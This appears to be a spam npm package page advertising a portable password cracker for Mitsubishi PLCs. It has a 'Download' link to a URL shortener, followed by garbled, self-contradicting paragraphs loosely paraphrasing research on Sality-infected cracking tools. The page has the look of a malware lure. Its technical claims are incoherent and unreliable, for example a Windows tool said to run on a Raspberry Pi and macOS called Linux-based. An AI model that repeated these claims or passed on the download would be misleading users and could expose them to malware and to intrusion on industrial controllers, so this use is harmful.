1.0.0 • Published 1 year ago

mitsubishi_plc_password_cracker_portable_krkyp v1.0.0

Weekly downloads
-
License
ISC
Repository
-
Last release
1 year ago

Mitsubishi Plc Password Cracker PORTABLE

Download >>> https://urlgoal.com/2tk5g0

“we recommend that end users who have accidentally fallen victim to sality download 1password from its official website and copy the password data into their new service. do not reuse the credentials and, especially, do not use sality.”


the tool can also be run from windows on a raspberry pi. the team found that the tool will crash on certain versions of linux. however, it worked perfectly on debian 9 on a raspberry pi 3b. unlike the automation direct, this tool works from linux-based os (e.g. linux, windows, mac os), dragos said. 


as the tool exploits the password-cracking feature embedded in the original application, it does not require configuration of the device to work. however, this feature is not active by default and requires that the operator runs the application and manually attempts to retrieve the credentials. depending on the plc and operating system, it can take a few moments to see the list of devices in the local network, browse one by one to find the device to crack, and match the connection with a saved configuration file.


for starters, dragos researchers found that the tool identifies itself as mts-b-id.exe when run. researchers also found that the tool reads a configuration file, reads the url of the website with a list of names, and connects to google's geocode service using the ip address.


once connected to the device, the tool downloads an example configuration file and then reads the urls from the application example, located on a website hosted on the same domain as the application. the urls include: sms_config.txt for instance, is which decrypts the configuration file, inspect_file.aspx, and restore_password.aspx. the urls are saved on-the-fly to the windows clipboard as seen in figure 2. 84d34552a1